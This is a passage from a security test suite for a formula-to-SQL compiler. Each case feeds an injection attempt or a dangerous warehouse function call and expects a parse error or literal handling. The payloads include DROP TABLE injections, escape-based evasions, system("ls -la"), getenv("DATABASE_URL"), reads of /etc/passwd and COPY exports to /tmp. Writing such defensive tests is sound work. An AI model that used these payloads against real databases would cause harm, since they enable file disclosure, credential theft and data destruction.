        formula: '=A ORDER BY 1',
        description: 'ORDER BY must not parse in formula context',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-group-by',
        formula: '=A GROUP BY 1',
        description: 'GROUP BY must not parse in formula context',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-limit',
        formula: '=A LIMIT 1',
        description: 'LIMIT keyword must not parse in formula context',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-over-window',
        formula: '=A OVER (PARTITION BY A)',
        description: 'OVER clause must not parse — prevents window function injection',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-with-cte',
        formula: '=WITH evil AS (SELECT 1) SELECT * FROM evil',
        description: 'WITH/CTE must not parse — prevents arbitrary query injection',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-join',
        formula: '=A JOIN other_table ON 1=1',
        description: 'JOIN keyword must not parse',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-lateral',
        formula: '=LATERAL (SELECT 1)',
        description: 'LATERAL keyword must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-returning',
        formula: '=1 RETURNING *',
        description: 'RETURNING clause must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-is-operator',
        formula: '=A IS NOT NULL',
        description: 'IS operator must not parse in formula — use IF/COALESCE instead',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },
    {
        id: 'security/grammar-not-exists',
        formula: '=NOT EXISTS (SELECT 1 FROM test_orders)',
        description: 'NOT EXISTS must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'sql-keywords'],
    },

    // ========================================================================
    // CATEGORY 15: Table-qualified and schema-qualified references
    // Attackers may try to reference columns from other tables by using
    // dot-separated identifiers to escape the allowed column mapping.
    // ========================================================================

    {
        id: 'security/grammar-table-qualified-column',
        formula: '=test_orders.order_amount',
        description: 'Table-qualified column references must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'qualified-refs'],
    },
    {
        id: 'security/grammar-schema-qualified',
        formula: '=public.test_orders.order_amount',
        description: 'Schema-qualified references must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'qualified-refs'],
    },
    {
        id: 'security/grammar-catalog-qualified',
        formula: '=catalog.schema.table.column',
        description: 'Fully-qualified four-part references must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'qualified-refs'],
    },
    {
        id: 'security/grammar-information-schema-dot',
        formula: '=information_schema.tables.table_name',
        description: 'Information schema access via dotted reference must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'qualified-refs'],
    },

    // ========================================================================
    // CATEGORY 16: Operator-based breakout
    // Some SQL operators could be used to inject code if the grammar
    // accepts them outside of the intended expression operators.
    // ========================================================================

    {
        id: 'security/grammar-pipe-concat',
        formula: '=A || pg_sleep(5)',
        description: 'SQL || concatenation operator must not execute arbitrary functions',
        columns: { A: 'customer_name' },
        sourceTable: 'test_orders',
        expectedRows: [],
        // Either || is not in the grammar (parse error) or pg_sleep is still rejected
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'operator-breakout'],
    },
    {
        id: 'security/grammar-assignment',
        formula: '=A := 1',
        description: 'Assignment operator := must not parse',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'operator-breakout'],
    },
    {
        id: 'security/grammar-arrow-operator',
        formula: '=A -> "key"',
        description: 'JSON arrow operator must not parse — prevents JSON path injection',
        columns: { A: 'customer_name' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'operator-breakout'],
    },
    {
        id: 'security/grammar-double-arrow-operator',
        formula: '=A ->> "key"',
        description: 'JSON ->> operator must not parse',
        columns: { A: 'customer_name' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'operator-breakout'],
    },
    {
        id: 'security/grammar-tilde-regex',
        formula: '=A ~ ".*"',
        description: 'Regex match operator ~ must not parse',
        columns: { A: 'customer_name' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'operator-breakout'],
    },

    // ========================================================================
    // CATEGORY 17: Whitespace and encoding evasion
    // Attackers may use non-standard whitespace, newlines, or encoding
    // tricks to break the parser or sneak through validation.
    // ========================================================================

    {
        id: 'security/grammar-newline-injection',
        formula: '=A\nUNION SELECT 1',
        description: 'Newline before SQL keyword must not enable injection',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'encoding-evasion'],
    },
    {
        id: 'security/grammar-tab-injection',
        formula: '=A\tUNION\tSELECT\t1',
        description: 'Tab characters must not enable SQL keyword injection',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'encoding-evasion'],
    },
    {
        id: 'security/grammar-carriage-return',
        formula: '=A\r\nDROP TABLE test_orders',
        description: 'CRLF must not enable injection',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'encoding-evasion'],
    },
    {
        id: 'security/sqli-e-string-escape',
        formula: `=E'\\x27; DROP TABLE test_orders; --'`,
        description: 'PostgreSQL E-string escape syntax must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'encoding-evasion'],
    },
    {
        id: 'security/sqli-hex-literal',
        formula: '=0x44524F50',
        description: 'Hex literals must not parse as SQL code',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'encoding-evasion'],
    },
    {
        id: 'security/sqli-unicode-escape',
        formula: `=U&'\\0027; DROP TABLE test_orders'`,
        description: 'Unicode escape string syntax must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'encoding-evasion'],
    },

    // ========================================================================
    // CATEGORY 18: DML/DDL keywords
    // Direct DML/DDL statements that weren't covered in the grammar tests.
    // ========================================================================

    {
        id: 'security/grammar-insert',
        formula: '=INSERT INTO test_orders VALUES(99)',
        description: 'INSERT statement must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'dml-ddl'],
    },
    {
        id: 'security/grammar-update',
        formula: '=UPDATE test_orders SET id=1',
        description: 'UPDATE statement must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'dml-ddl'],
    },
    {
        id: 'security/grammar-delete',
        formula: '=DELETE FROM test_orders',
        description: 'DELETE statement must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'dml-ddl'],
    },
    {
        id: 'security/grammar-drop',
        formula: '=DROP TABLE test_orders',
        description: 'DROP statement must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'dml-ddl'],
    },
    {
        id: 'security/grammar-alter',
        formula: '=ALTER TABLE test_orders ADD COLUMN evil TEXT',
        description: 'ALTER statement must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'dml-ddl'],
    },
    {
        id: 'security/grammar-truncate',
        formula: '=TRUNCATE test_orders',
        description: 'TRUNCATE statement must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'dml-ddl'],
    },
    {
        id: 'security/grammar-grant',
        formula: '=GRANT ALL ON test_orders TO PUBLIC',
        description: 'GRANT statement must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'dml-ddl'],
    },
    {
        id: 'security/grammar-revoke',
        formula: '=REVOKE ALL ON test_orders FROM PUBLIC',
        description: 'REVOKE statement must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'dml-ddl'],
    },

    // ========================================================================
    // CATEGORY 19: Procedural / execution blocks
    // Warehouse-specific procedural blocks that could execute arbitrary code.
    // ========================================================================

    {
        id: 'security/grammar-do-block',
        formula: `=DO $$ BEGIN PERFORM pg_sleep(5); END $$`,
        description: 'PostgreSQL DO block must not parse — anonymous code execution',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'procedural'],
    },
    {
        id: 'security/grammar-execute-immediate',
        formula: '=EXECUTE IMMEDIATE "DROP TABLE test_orders"',
        description: 'EXECUTE IMMEDIATE must not parse — dynamic SQL execution',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'procedural'],
    },
    {
        id: 'security/grammar-prepare',
        formula: '=PREPARE stmt AS SELECT 1',
        description: 'PREPARE statement must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'procedural'],
    },
    {
        id: 'security/grammar-call',
        formula: '=CALL dangerous_procedure()',
        description: 'CALL statement must not parse — stored procedure execution',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'procedural'],
    },
    {
        id: 'security/grammar-create-function',
        formula: '=CREATE FUNCTION evil() RETURNS INT AS $$ SELECT 1 $$',
        description: 'CREATE FUNCTION must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'procedural'],
    },

    // ========================================================================
    // CATEGORY 20: Additional warehouse-specific dangerous functions
    // ========================================================================

    // --- DuckDB ---
    {
        id: 'security/fn-duckdb-system',
        formula: '=system("ls -la")',
        description: 'DuckDB system() must be rejected — OS command execution',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },
    {
        id: 'security/fn-duckdb-getenv',
        formula: '=getenv("DATABASE_URL")',
        description: 'DuckDB getenv() must be rejected — environment variable disclosure',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },
    {
        id: 'security/fn-duckdb-glob',
        formula: '=glob("/etc/*")',
        description: 'DuckDB glob() must be rejected — filesystem enumeration',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },
    {
        id: 'security/fn-duckdb-functions-table',
        formula: '=duckdb_functions()',
        description: 'duckdb_functions() must be rejected — internal catalog enumeration',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },
    {
        id: 'security/fn-duckdb-read-blob',
        formula: '=read_blob("/etc/passwd")',
        description: 'DuckDB read_blob must be rejected — binary file read',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },
    {
        id: 'security/fn-duckdb-read-text',
        formula: '=read_text("/etc/passwd")',
        description: 'DuckDB read_text must be rejected — text file read',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'duckdb'],
    },

    // --- PostgreSQL ---
    {
        id: 'security/fn-pg-terminate-backend',
        formula: '=pg_terminate_backend(1)',
        description: 'pg_terminate_backend must be rejected — kill other sessions',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-pg-cancel-backend',
        formula: '=pg_cancel_backend(1)',
        description: 'pg_cancel_backend must be rejected — cancel other queries',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-pg-stat-file',
        formula: '=pg_stat_file("/etc/passwd")',
        description: 'pg_stat_file must be rejected — filesystem stat',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-pg-advisory-lock',
        formula: '=pg_advisory_lock(1)',
        description: 'pg_advisory_lock must be rejected — DoS via locking',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-pg-notify',
        formula: '=pg_notify("channel", "payload")',
        description: 'pg_notify must be rejected — side-channel data exfiltration',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },
    {
        id: 'security/fn-pg-reload-conf',
        formula: '=pg_reload_conf()',
        description: 'pg_reload_conf must be rejected — server config reload',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'postgres'],
    },

    // --- BigQuery ---
    {
        id: 'security/fn-bq-session-user',
        formula: '=SESSION_USER()',
        description: 'SESSION_USER must be rejected — credential disclosure',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'bigquery'],
    },
    {
        id: 'security/fn-bq-external-query',
        formula: '=EXTERNAL_QUERY("connection_id", "SELECT 1")',
        description: 'EXTERNAL_QUERY must be rejected — cross-project query execution',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'bigquery'],
    },
    {
        id: 'security/fn-bq-safe-prefix',
        formula: '=SAFE.DIVIDE(1, 0)',
        description: 'SAFE. prefix must not parse — BigQuery function modifier',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'bigquery'],
    },
    {
        id: 'security/fn-bq-net-ip-from-string',
        formula: '=NET.IP_FROM_STRING("0.0.0.0")',
        description: 'BigQuery NET. functions must not parse — namespace prefix',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'bigquery'],
    },

    // --- Snowflake ---
    {
        id: 'security/fn-snowflake-system-allowlist',
        formula: '=SYSTEM$ALLOWLIST()',
        description: 'SYSTEM$ALLOWLIST must be rejected — network policy disclosure',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'snowflake'],
    },
    {
        id: 'security/fn-snowflake-system-pipe-status',
        formula: '=SYSTEM$PIPE_STATUS("pipe_name")',
        description: 'SYSTEM$PIPE_STATUS must be rejected — infra disclosure',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'snowflake'],
    },
    {
        id: 'security/fn-snowflake-execute-task',
        formula: '=SYSTEM$EXECUTE_TASK("task_name")',
        description: 'SYSTEM$EXECUTE_TASK must be rejected — task execution',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'Unknown function',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'function-allowlist', 'snowflake'],
    },

    // ========================================================================
    // CATEGORY 21: Wildcard and star injection
    // Attempting to use * outside of string context to enumerate all columns.
    // ========================================================================

    {
        id: 'security/grammar-bare-star',
        formula: '=*',
        description: 'Bare * must not parse — prevents SELECT * injection',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'wildcard'],
    },
    {
        id: 'security/grammar-count-star',
        formula: '=COUNT(*)',
        description: 'COUNT(*) — star as argument must not enable column enumeration',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        // This may either fail to parse * or succeed as valid aggregation.
        // The key is that * does not enumerate columns from other tables.
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'wildcard'],
    },

    // ========================================================================
    // CATEGORY 22: String injection via double-quote breakout
    // Since the formula language uses double quotes for strings, verify
    // the compiler properly escapes them when generating SQL (which uses
    // single quotes for strings).
    // ========================================================================

    {
        id: 'security/sqli-double-quote-breakout',
        formula: `=CONCAT("x", "' OR ''='")`,
        description: 'Injection via double-quote string that contains SQL single-quote pattern',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("x' OR ''='"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-nested-quotes',
        formula: `="\\\\'; DROP TABLE test_orders; --"`,
        description: 'Double backslash before quote must not defeat escaping',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("\\\\'; DROP TABLE test_orders; --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-unicode-in-string',
        formula: `="\\u0027; DROP TABLE test_orders; --"`,
        description: 'Unicode escape for single quote in string must be treated as literal data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("\\u0027; DROP TABLE test_orders; --"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },

    // ========================================================================
    // CATEGORY 23: Recursive CTE / DoS via query complexity
    // Even if CTEs are blocked at the grammar level, verify through
    // expression-level DoS attempts.
    // ========================================================================

    {
        id: 'security/grammar-recursive-cte',
        formula: '=WITH RECURSIVE r AS (SELECT 1 UNION ALL SELECT r+1 FROM r) SELECT * FROM r',
        description: 'Recursive CTE must not parse — prevents infinite loop DoS',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'dos'],
    },

    // ========================================================================
    // CATEGORY 24: COPY / IMPORT / EXPORT commands
    // Warehouse commands for data import/export that could exfiltrate or
    // overwrite data.
    // ========================================================================

    {
        id: 'security/grammar-copy-to',
        formula: `=COPY test_orders TO '/tmp/exfil.csv'`,
        description: 'COPY TO must not parse — data export to filesystem',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'data-exfiltration'],
    },
    {
        id: 'security/grammar-copy-from',
        formula: `=COPY test_orders FROM '/tmp/evil.csv'`,
        description: 'COPY FROM must not parse — data import from filesystem',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'data-exfiltration'],
    },

    // ========================================================================
    // CATEGORY 25: Type coercion tricks
    // Attempting to use SQL type coercion to smuggle code through.
    // ========================================================================

    {
        id: 'security/grammar-cast-as-syntax',
        formula: '=CAST(1 AS VARCHAR)',
        description: 'SQL CAST(x AS type) syntax must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'type-casting'],
    },
    {
        id: 'security/grammar-safe-cast',
        formula: '=SAFE_CAST("1" AS INT64)',
        description: 'BigQuery SAFE_CAST must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'type-casting'],
    },
    {
        id: 'security/grammar-interval-type',
        formula: `=INTERVAL '1 day'`,
        description: 'INTERVAL literal syntax must not parse',
        columns: {},
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'type-casting'],
    },

    // ========================================================================
    // CATEGORY 26: Multi-expression / comma injection
    // Attempting to add additional SELECT columns via comma injection.
    // ========================================================================

    {
        id: 'security/grammar-comma-extra-column',
        formula: '=A, secret_column',
        description: 'Comma must not enable adding extra SELECT columns',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'comma-injection'],
    },
    {
        id: 'security/grammar-comma-subquery-column',
        formula: '=A, (SELECT password FROM users LIMIT 1)',
        description: 'Comma followed by subquery must not parse',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'comma-injection'],
    },

    // ========================================================================
    // CATEGORY 27: AS / alias injection
    // Attempting to rename the output column or inject aliases.
    // ========================================================================

    {
        id: 'security/grammar-as-alias',
        formula: '=A AS evil_alias',
        description: 'AS keyword must not parse in formula — prevents alias injection',
        columns: { A: 'order_amount' },
        sourceTable: 'test_orders',
        expectedRows: [],
        expectedError: 'parse error',
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'alias-injection'],
    },

    // ========================================================================
    // CATEGORY 28: Snowflake/BigQuery single-quote string handling
    // Formulas use double-quoted strings but SQL uses single-quoted.
    // Verify the compiler correctly translates and escapes.
    // ========================================================================

    {
        id: 'security/sqli-empty-string-injection',
        formula: `=""`,
        description: 'Empty string must compile to safe empty SQL string',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows(''),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-only-single-quotes',
        formula: `="'"`,
        description: 'A single quote as the entire string must be safely escaped',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("'"),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
    {
        id: 'security/sqli-long-payload',
        formula: `="${"'; DROP TABLE test_orders; --".repeat(10)}"`,
        description: 'Repeated injection payload must all be treated as data',
        columns: {},
        sourceTable: 'test_orders',
        orderBy: 'id',
        expectedRows: tenRows("'; DROP TABLE test_orders; --".repeat(10)),
        warehouses: ALL_WAREHOUSES,
        tier: 1,
        tags: ['security', 'string-injection'],
    },
];
